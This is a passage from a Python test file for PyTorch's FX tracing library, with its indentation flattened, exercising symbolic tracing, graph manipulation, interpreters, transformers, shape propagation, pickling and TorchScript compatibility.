op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_close(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_close(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_close(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
@unittest.skip("Hotfix for SEV remediation")
def test_trace_buffer_slice(self):
bs, d_hid = 10, 23
class ExampleCode(torch.nn.Module):
def __init__(self):
super().__init__()
self.mm_param = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.mm_param2 = torch.nn.Parameter(torch.randn(d_hid, d_hid))
self.lin = torch.nn.Linear(d_hid, d_hid)
self.register_buffer('buffer', torch.randn(bs + 100, d_hid))
def forward(self, x):
x = torch.mm(x, self.mm_param)
skip_connection = x
x = torch.relu(x)
x = torch.mm(x, self.mm_param) + self.buffer[:x.shape[0]]
x = self.lin(x)
x = torch.relu(x)
x = x + skip_connection
x = torch.mm(x, self.mm_param2)
x = self.lin(x)
return x
ec = ExampleCode()
traced = torch.fx.symbolic_trace(ec)
x = torch.randn(bs, d_hid)
torch.testing.assert_allclose(ec(x), traced(x))
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_tensor_attribute_coalseced(self):
def count_attrs(fx_module):
targets = set()
for node in traced.graph.nodes:
if node.op == 'get_attr':
targets.add(node.target)
return len(targets)
val = torch.tensor(5)
def f(x):
return x + val + val
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 1)
val2 = torch.tensor(5)
def f(x):
val = torch.tensor(5)
return x + val + val2
traced = symbolic_trace(f)
traced.graph.lint()
self.assertEqual(count_attrs(traced), 2)
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_deepcopy_graph_with_tracer_cls(self):
class TestTracer(Tracer):
def is_leaf_module(self, module, name):
return True
g = Graph(tracer_cls=TestTracer)
x = g.placeholder("x")
g.output(x)
h = copy.deepcopy(g)
self.assertIsNotNone(h._tracer_cls)
self.assertTrue(g._tracer_cls == h._tracer_cls)
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_autowrap_functions(self):
class AutowrapFnTest(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2)
class AutowrapFnTest2(torch.nn.Module):
def forward(self, x):
return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2)
# Check function(s) are wrapped
# `int` would normally throw a TypeError as argument can't be `Proxy`
tracer = Tracer(autowrap_functions=(fx_int,))
graph = tracer.trace(AutowrapFnTest())
traced = GraphModule(tracer.root, graph, 'test')
tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2))
tracer_2.trace(AutowrapFnTest2())
# Test scriptability
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(4)), 2)
def test_tuple_no_subscript(self):
def foo(x : Tuple):
return x[0]
traced = torch.fx.symbolic_trace(foo)
x = (torch.randn(5, 3),)
torch.testing.assert_allclose(traced(x), x[0])
bio = io.BytesIO()
torch.save(traced, bio)
bio.seek(0)
loaded = torch.load(bio)
torch.testing.assert_allclose(loaded(x), x[0])
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_torch_fx_getattr(self):
class FXGetattrTest(torch.nn.Module):
def forward(self, x):
return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3]))
traced = symbolic_trace(FXGetattrTest())
self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3]))
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
def test_torch_op_overloads(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.add.Tensor(a, a)
return b
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
for node in gm.graph.nodes:
if node.op == 'call_function':
assert isinstance(node.target, torch._ops.OpOverload)
assert node.target.__name__ == 'add.Tensor'
def test_pickle_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_remove_uses_with_custom_filter(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu, lambda x: x != neg)
self.assertTrue(neg in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_wrong_target_type(self):
graph : torch.fx.Graph = torch.fx.Graph()
with self.assertRaises(ValueError):
n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo',
args=(), kwargs={})
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_interpreter_default_args(self):
class Model(torch.nn.Module):
def forward(self, x, y=3.14159):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
out = interp.run(x)
torch.testing.assert_allclose(out, x + 3.14159)
def test_interpreter_not_enough_args(self):
class Model(torch.nn.Module):
def forward(self, x, y):
return x + y
model = Model()
gm = torch.fx.symbolic_trace(model)
interp = Interpreter(gm)
x = torch.randn(5, 3)
with self.assertRaisesRegex(RuntimeError,
'Expected positional argument for parameter y, but one was not passed in'):
out = interp.run(x)
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
